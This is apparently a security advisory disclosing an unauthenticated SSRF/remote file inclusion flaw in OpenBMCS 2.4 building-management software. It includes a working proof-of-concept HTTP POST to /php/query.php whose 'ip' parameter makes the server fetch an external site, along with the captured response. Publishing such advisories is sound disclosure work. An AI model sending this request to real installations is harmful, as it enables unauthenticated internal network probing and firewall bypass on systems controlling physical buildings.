OpenBMCS 2.4 Remote File Inclusion / Server-Side Request Forgery

`  
OpenBMCS 2.4 Unauthenticated SSRF / RFI  
  
  
Vendor: OPEN BMCS  
Product web page: https://www.openbmcs.com  
Affected version: 2.4  
  
Summary: Building Management & Controls System (BMCS). No matter what the  
size of your business, the OpenBMCS software has the ability to expand to  
hundreds of controllers. Our product can control and monitor anything from  
a garage door to a complete campus wide network, with everything you need  
on board.  
  
Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include  
(RFI) vulnerability exists in OpenBMCS within its functionalities. The application  
parses user supplied data in the POST parameter 'ip' to query a server IP on port  
81 by default. Since no validation is carried out on the parameter, an attacker  
can specify an external domain and force the application to make an HTTP request  
to an arbitrary destination host. This can be used by an external attacker for  
example to bypass firewalls and initiate a service and network enumeration on the  
internal network through the affected application, allows hijacking the current  
session of the user, execute cross-site scripting code or changing the look of  
the page and content modification on current display.  
  
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)  
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)  
Apache/2.4.41 (Ubuntu)  
Apache/2.4.25 (Debian)  
nginx/1.16.1  
PHP/7.4.3  
PHP/7.0.33-0+deb9u9  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5694  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php  
  
  
26.10.2021  
  
--  
  
  
POST /php/query.php HTTP/1.1  
Host: 192.168.1.222  
Content-Length: 29  
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"  
Accept: */*  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://192.168.1.222  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://192.168.1.222/index.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
ip=www.columbia.edu:80&argu=/  
  
  
HTTP/1.1 302 Found  
Date: Tue, 14 Dec 2021 20:26:47 GMT  
Server: Apache/2.4.41 (Ubuntu)  
Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Location: ../login.php  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 32141  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">  
  
<!-- developed by CUIT -->  
<!-- 08/28/18, 8:55:54am --><head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<meta http-equiv="X-UA-Compatible" content="IE=edge" >  
<meta name="msvalidate.01" content="DB472D6D4C7DB1E74C6D939F9C8AA8B4" />  
<title>Columbia University in the City of New York</title>  
...  
...  
`